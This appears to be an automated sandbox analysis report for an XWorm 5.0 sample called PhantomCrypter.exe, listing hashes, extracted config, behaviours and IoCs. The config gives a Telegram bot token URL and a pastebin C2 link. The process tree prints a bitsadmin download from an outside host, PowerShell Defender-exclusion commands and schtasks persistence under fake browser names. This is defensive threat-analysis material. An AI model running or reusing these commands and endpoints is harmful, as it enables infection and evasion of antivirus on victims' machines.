Analysis
-
max time kernel
85s -
max time network
87s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
25-01-2025 10:45
Static task
static1
General
-
Target
PhantomCrypter.exe
-
Size
5.0MB
-
MD5
d4d28f2c6fd9af9ee5a3be30f9ab913b
-
SHA1
be4264bceaff957ff799b73ebc2479f0fc794815
-
SHA256
c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e
-
SHA512
7eed5b6d3420c930a07aee500e086ec61fd33099cd641a2efe7664081c0e5fdab4d1ad2b4835edcbe3e6722d44e60a75119a2900cfd00b7c182b20f379d7a977
-
SSDEEP
98304:6l1z3/RZ58MoFyQbbpaR2p1AU6cBSdOWWzSPfEIeGLGIQaW5tqwZ0ch1+NXHKgv3:Y1z5Z58MQJe2PAU6cBSkWWzaETGDW/t
Malware Config
Extracted
xworm
5.0
OnCH8EVI1tYADuXo
-
Install_directory
%LocalAppData%
-
install_file
msedge.exe
-
pastebin_url
https://pastebin.com/raw/RPPi3ByL
-
telegram
https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187
Signatures
-
Detect Xworm Payload 6 IoCs
resource yara_rule behavioral1/files/0x0005000000045685-6.dat family_xworm behavioral1/files/0x0028000000046173-25.dat family_xworm behavioral1/files/0x0028000000046174-36.dat family_xworm behavioral1/memory/3220-56-0x0000000000250000-0x000000000027E000-memory.dmp family_xworm behavioral1/memory/4656-58-0x0000000000040000-0x0000000000068000-memory.dmp family_xworm behavioral1/memory/3748-47-0x00000000009A0000-0x00000000009CC000-memory.dmp family_xworm -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4188 powershell.exe 632 powershell.exe 2768 powershell.exe 968 powershell.exe 4268 powershell.exe 3948 powershell.exe 3516 powershell.exe 4692 powershell.exe 1060 powershell.exe 4576 powershell.exe 3508 powershell.exe 1116 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 1816 bitsadmin.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3463531801-1484541064-3495084620-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-3463531801-1484541064-3495084620-1000\Control Panel\International\Geo\Nation PhantomCrypter.exe Key value queried \REGISTRY\USER\S-1-5-21-3463531801-1484541064-3495084620-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3463531801-1484541064-3495084620-1000\Control Panel\International\Geo\Nation Chrome Update.exe Key value queried \REGISTRY\USER\S-1-5-21-3463531801-1484541064-3495084620-1000\Control Panel\International\Geo\Nation OneDrive.exe -
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk OneDrive.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk OneDrive.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk msedge.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk msedge.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk Chrome Update.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk Chrome Update.exe -
Executes dropped EXE 8 IoCs
pid Process 3748 Chrome Update.exe 3220 msedge.exe 4656 OneDrive.exe 3880 TOPHERC.exe 1696 OneDrive.exe 4616 msedge.exe 1308 OneDrive.exe 2920 msedge.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3463531801-1484541064-3495084620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome Update = "C:\\Users\\Admin\\AppData\\Roaming\\Chrome Update.exe" Chrome Update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463531801-1484541064-3495084620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\OneDrive.exe" OneDrive.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
flow ioc 31 pastebin.com 70 pastebin.com 86 pastebin.com 117 pastebin.com 30 pastebin.com 101 pastebin.com 103 pastebin.com 108 pastebin.com 115 pastebin.com 48 pastebin.com 66 pastebin.com 69 pastebin.com 83 pastebin.com 32 pastebin.com 34 pastebin.com 67 pastebin.com 72 pastebin.com 107 pastebin.com 113 pastebin.com 73 pastebin.com 80 pastebin.com 96 pastebin.com 102 pastebin.com 49 pastebin.com 82 pastebin.com 110 pastebin.com 105 pastebin.com 106 pastebin.com 116 pastebin.com 20 pastebin.com 29 pastebin.com 41 pastebin.com 99 pastebin.com 26 pastebin.com 65 pastebin.com 76 pastebin.com 87 pastebin.com 35 pastebin.com 84 pastebin.com 111 pastebin.com 45 pastebin.com 75 pastebin.com 90 pastebin.com 79 pastebin.com 97 pastebin.com 100 pastebin.com 112 pastebin.com 19 pastebin.com 50 pastebin.com 59 pastebin.com 74 pastebin.com 118 pastebin.com 85 pastebin.com 88 pastebin.com 114 pastebin.com 53 pastebin.com 64 pastebin.com 71 pastebin.com 98 pastebin.com 47 pastebin.com 57 pastebin.com 78 pastebin.com 81 pastebin.com 25 pastebin.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TOPHERC.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3463531801-1484541064-3495084620-1000_Classes\Local Settings PhantomCrypter.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4244 schtasks.exe 2380 schtasks.exe 2200 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 3516 powershell.exe 3516 powershell.exe 3516 powershell.exe 4692 powershell.exe 4692 powershell.exe 4692 powershell.exe 1060 powershell.exe 1060 powershell.exe 4576 powershell.exe 4576 powershell.exe 4576 powershell.exe 1060 powershell.exe 632 powershell.exe 632 powershell.exe 632 powershell.exe 3508 powershell.exe 3508 powershell.exe 2768 powershell.exe 2768 powershell.exe 2768 powershell.exe 3508 powershell.exe 968 powershell.exe 968 powershell.exe 968 powershell.exe 1116 powershell.exe 3948 powershell.exe 1116 powershell.exe 3948 powershell.exe 4268 powershell.exe 4268 powershell.exe 1116 powershell.exe 3948 powershell.exe 4268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3748 Chrome Update.exe Token: SeDebugPrivilege 3220 msedge.exe Token: SeDebugPrivilege 4656 OneDrive.exe Token: SeDebugPrivilege 4188 powershell.exe Token: SeDebugPrivilege 3516 powershell.exe Token: SeDebugPrivilege 4692 powershell.exe Token: SeIncreaseQuotaPrivilege 4188 powershell.exe Token: SeSecurityPrivilege 4188 powershell.exe Token: SeTakeOwnershipPrivilege 4188 powershell.exe Token: SeLoadDriverPrivilege 4188 powershell.exe Token: SeSystemProfilePrivilege 4188 powershell.exe Token: SeSystemtimePrivilege 4188 powershell.exe Token: SeProfSingleProcessPrivilege 4188 powershell.exe Token: SeIncBasePriorityPrivilege 4188 powershell.exe Token: SeCreatePagefilePrivilege 4188 powershell.exe Token: SeBackupPrivilege 4188 powershell.exe Token: SeRestorePrivilege 4188 powershell.exe Token: SeShutdownPrivilege 4188 powershell.exe Token: SeDebugPrivilege 4188 powershell.exe Token: SeSystemEnvironmentPrivilege 4188 powershell.exe Token: SeRemoteShutdownPrivilege 4188 powershell.exe Token: SeUndockPrivilege 4188 powershell.exe Token: SeManageVolumePrivilege 4188 powershell.exe Token: 33 4188 powershell.exe Token: 34 4188 powershell.exe Token: 35 4188 powershell.exe Token: 36 4188 powershell.exe Token: SeIncreaseQuotaPrivilege 3516 powershell.exe Token: SeSecurityPrivilege 3516 powershell.exe Token: SeTakeOwnershipPrivilege 3516 powershell.exe Token: SeLoadDriverPrivilege 3516 powershell.exe Token: SeSystemProfilePrivilege 3516 powershell.exe Token: SeSystemtimePrivilege 3516 powershell.exe Token: SeProfSingleProcessPrivilege 3516 powershell.exe Token: SeIncBasePriorityPrivilege 3516 powershell.exe Token: SeCreatePagefilePrivilege 3516 powershell.exe Token: SeBackupPrivilege 3516 powershell.exe Token: SeRestorePrivilege 3516 powershell.exe Token: SeShutdownPrivilege 3516 powershell.exe Token: SeDebugPrivilege 3516 powershell.exe Token: SeSystemEnvironmentPrivilege 3516 powershell.exe Token: SeRemoteShutdownPrivilege 3516 powershell.exe Token: SeUndockPrivilege 3516 powershell.exe Token: SeManageVolumePrivilege 3516 powershell.exe Token: 33 3516 powershell.exe Token: 34 3516 powershell.exe Token: 35 3516 powershell.exe Token: 36 3516 powershell.exe Token: SeIncreaseQuotaPrivilege 4692 powershell.exe Token: SeSecurityPrivilege 4692 powershell.exe Token: SeTakeOwnershipPrivilege 4692 powershell.exe Token: SeLoadDriverPrivilege 4692 powershell.exe Token: SeSystemProfilePrivilege 4692 powershell.exe Token: SeSystemtimePrivilege 4692 powershell.exe Token: SeProfSingleProcessPrivilege 4692 powershell.exe Token: SeIncBasePriorityPrivilege 4692 powershell.exe Token: SeCreatePagefilePrivilege 4692 powershell.exe Token: SeBackupPrivilege 4692 powershell.exe Token: SeRestorePrivilege 4692 powershell.exe Token: SeShutdownPrivilege 4692 powershell.exe Token: SeDebugPrivilege 4692 powershell.exe Token: SeSystemEnvironmentPrivilege 4692 powershell.exe Token: SeRemoteShutdownPrivilege 4692 powershell.exe Token: SeUndockPrivilege 4692 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3880 TOPHERC.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 3464 wrote to memory of 3748 3464 PhantomCrypter.exe 84 PID 3464 wrote to memory of 3748 3464 PhantomCrypter.exe 84 PID 3464 wrote to memory of 1900 3464 PhantomCrypter.exe 85 PID 3464 wrote to memory of 1900 3464 PhantomCrypter.exe 85 PID 3464 wrote to memory of 1900 3464 PhantomCrypter.exe 85 PID 3464 wrote to memory of 3220 3464 PhantomCrypter.exe 86 PID 3464 wrote to memory of 3220 3464 PhantomCrypter.exe 86 PID 3464 wrote to memory of 4656 3464 PhantomCrypter.exe 87 PID 3464 wrote to memory of 4656 3464 PhantomCrypter.exe 87 PID 3464 wrote to memory of 3880 3464 PhantomCrypter.exe 88 PID 3464 wrote to memory of 3880 3464 PhantomCrypter.exe 88 PID 3464 wrote to memory of 3880 3464 PhantomCrypter.exe 88 PID 1900 wrote to memory of 1816 1900 mshta.exe 89 PID 1900 wrote to memory of 1816 1900 mshta.exe 89 PID 1900 wrote to memory of 1816 1900 mshta.exe 89 PID 3748 wrote to memory of 4188 3748 Chrome Update.exe 93 PID 3748 wrote to memory of 4188 3748 Chrome Update.exe 93 PID 4656 wrote to memory of 3516 4656 OneDrive.exe 95 PID 4656 wrote to memory of 3516 4656 OneDrive.exe 95 PID 3220 wrote to memory of 4692 3220 msedge.exe 97 PID 3220 wrote to memory of 4692 3220 msedge.exe 97 PID 3220 wrote to memory of 1060 3220 msedge.exe 100 PID 3220 wrote to memory of 1060 3220 msedge.exe 100 PID 3748 wrote to memory of 4576 3748 Chrome Update.exe 101 PID 3748 wrote to memory of 4576 3748 Chrome Update.exe 101 PID 4656 wrote to memory of 632 4656 OneDrive.exe 104 PID 4656 wrote to memory of 632 4656 OneDrive.exe 104 PID 3220 wrote to memory of 3508 3220 msedge.exe 106 PID 3220 wrote to memory of 3508 3220 msedge.exe 106 PID 3748 wrote to memory of 2768 3748 Chrome Update.exe 108 PID 3748 wrote to memory of 2768 3748 Chrome Update.exe 108 PID 4656 wrote to memory of 968 4656 OneDrive.exe 110 PID 4656 wrote to memory of 968 4656 OneDrive.exe 110 PID 3748 wrote to memory of 1116 3748 Chrome Update.exe 112 PID 3748 wrote to memory of 1116 3748 Chrome Update.exe 112 PID 3220 wrote to memory of 4268 3220 msedge.exe 113 PID 3220 wrote to memory of 4268 3220 msedge.exe 113 PID 4656 wrote to memory of 3948 4656 OneDrive.exe 114 PID 4656 wrote to memory of 3948 4656 OneDrive.exe 114 PID 3748 wrote to memory of 4244 3748 Chrome Update.exe 118 PID 3748 wrote to memory of 4244 3748 Chrome Update.exe 118 PID 4656 wrote to memory of 2380 4656 OneDrive.exe 122 PID 4656 wrote to memory of 2380 4656 OneDrive.exe 122 PID 3220 wrote to memory of 2200 3220 msedge.exe 124 PID 3220 wrote to memory of 2200 3220 msedge.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe"C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Users\Admin\AppData\Roaming\Chrome Update.exe"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1116
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4244
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:1816
-
-
-
C:\Users\Admin\AppData\Roaming\msedge.exe"C:\Users\Admin\AppData\Roaming\msedge.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4268
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2200
-
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3948
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2380
-
-
-
C:\Users\Admin\AppData\Roaming\TOPHERC.exe"C:\Users\Admin\AppData\Roaming\TOPHERC.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:3880
-
-
C:\ProgramData\OneDrive.exe"C:\ProgramData\OneDrive.exe"1⤵
- Executes dropped EXE
PID:1696
-
C:\Users\Admin\AppData\Local\msedge.exe"C:\Users\Admin\AppData\Local\msedge.exe"1⤵
- Executes dropped EXE
PID:4616
-
C:\ProgramData\OneDrive.exe"C:\ProgramData\OneDrive.exe"1⤵
- Executes dropped EXE
PID:1308
-
C:\Users\Admin\AppData\Local\msedge.exe"C:\Users\Admin\AppData\Local\msedge.exe"1⤵
- Executes dropped EXE
PID:2920
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD511c6e74f0561678d2cf7fc075a6cc00c
SHA1535ee79ba978554abcb98c566235805e7ea18490
SHA256d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63
SHA51232c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD5f0f59cccd39a3694e0e6dfd44d0fa76d
SHA1fccd7911d463041e1168431df8823e4c4ea387c1
SHA25670466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401
SHA5125c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee
-
Filesize
1KB
MD560b3262c3163ee3d466199160b9ed07d
SHA1994ece4ea4e61de0be2fdd580f87e3415f9e1ff6
SHA256e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb
SHA512081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af
-
Filesize
1KB
MD5217880b10b5c7db534e6ca11f04d3059
SHA1a8ed869652e28617871b7a245185870e743e424b
SHA256d5f871b09ecc1aa703a94e282cc786ca47c0020dc27f67a162854e6fa8a95793
SHA51237f36749073eed66aa461d1ec57d45d6983f7623f12fb03abcc0ba4a08efe430d7a0632d93674f4671d7e3dce767927275dd56763a92eef5c40ddb02be2ccfc5
-
Filesize
1KB
MD5d9b023aba025ea7da423b289925e657b
SHA1bbc92618b431ec1a52a0db3e42aafa91c056a208
SHA2561a8c94830603da734d2c9e5178c30b639120937b79138cc5e49b6dbfa8ce4337
SHA51224c2a91b77b216aff8afc2392fd647cb49567c0ac41c8f9610c9f94aeac8958490018f28bdc7174fcfd086862ab482ed4949c0e7f359239fdc18a13194feaf1d
-
Filesize
1KB
MD54eb1592ecfd799f8b528ca4adbbaef3e
SHA1669179cc8407d3d7e5e30a8707379a3056ffb445
SHA2564d94fa0280fc0b680305be8ca83344177069577a0b06cbb63f009b898e3341bc
SHA512a3b60512ba3bb0e2d7c55e5927d548e6316a48ae1e69ef0a819550e72f023ae8b1767c6f45781e3a91e0c3c1357bc3cf344fb41f28ca89ddd13ecfee972e003e
-
Filesize
1KB
MD55dc0bf06113f867ab9be36428acea530
SHA1bd73ca9bf3e5edc80370f4bc79eb403772440105
SHA256d8e861ab4e7c40d5ccae45c056a72219decadc6061a0020cae2dfec8dc55e4ae
SHA512e92b837a30d55b7d0f38aafc3a9403d77f2672b1de2113ba1926c7e84c89248813b50f942cbb72a166819f773b8ac4ba40d5a3329e1a815a2f833234b5a1d98d
-
Filesize
1KB
MD5c238412481a146ab11982ee82490777c
SHA161451087cbd22daf63c18b6c3c939fe0952f27c3
SHA25625f1c3a4b36ae44eb159193c17cc953ae3fa576928f2384865ab837a964bd9f2
SHA5124ee702b05336364af8cb89a6dd162b9404a8307c5fef96b7af82e8db55459b65b0ce1ce6f6e3018aa213a73f42ba5dc80d8550e45baf756ef0b8b8459e7f9f9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
152KB
MD516cdd301591c6af35a03cd18caee2e59
SHA192c6575b57eac309c8664d4ac76d87f2906e8ef3
SHA25611d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8
SHA512a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476
-
Filesize
844B
MD53f8a283abe6fe28a7d217c8105041426
SHA10283cd67e7cc0a99eeae3c3dea69716a6ac75bb1
SHA256333c439c84ccbcab11dd9cc7f4d90596c5b65caf1164e8a908e61aa0222916b1
SHA512bc5f8f256356c689953516877f8b7895fb1efe587feabdddf0e1524d0b22e3dcb89e0e654d19d0c314c6a376a0e7594965178a353d147ea98c43d3d5976f1846
-
Filesize
140KB
MD5a1cd6f4a3a37ed83515aa4752f98eb1d
SHA17f787c8d72787d8d130b4788b006b799167d1802
SHA2565cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65
SHA5129489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355
-
Filesize
4.2MB
MD579f2fd33a188ff47216b4f4dd4552582
SHA116e40e0a1fed903fec20cd6cd600e3a2548881ad
SHA256cc45d38fa00c5aeb33bdf842166460117b5e70b0b4fcf5bb6ef9747ec0b0575f
SHA512caa33702fdc7e480a6093d2af035f860044a4e960fd6e5a4b91d6019f2c3d4c235d9e95734e6b54ea2a88af4e96bf72a54d81b2a70c1f64e76dcd202891905f2
-
Filesize
166KB
MD5aee20d80f94ae0885bb2cabadb78efc9
SHA11e82eba032fcb0b89e1fdf937a79133a5057d0a1
SHA256498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d
SHA5123a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42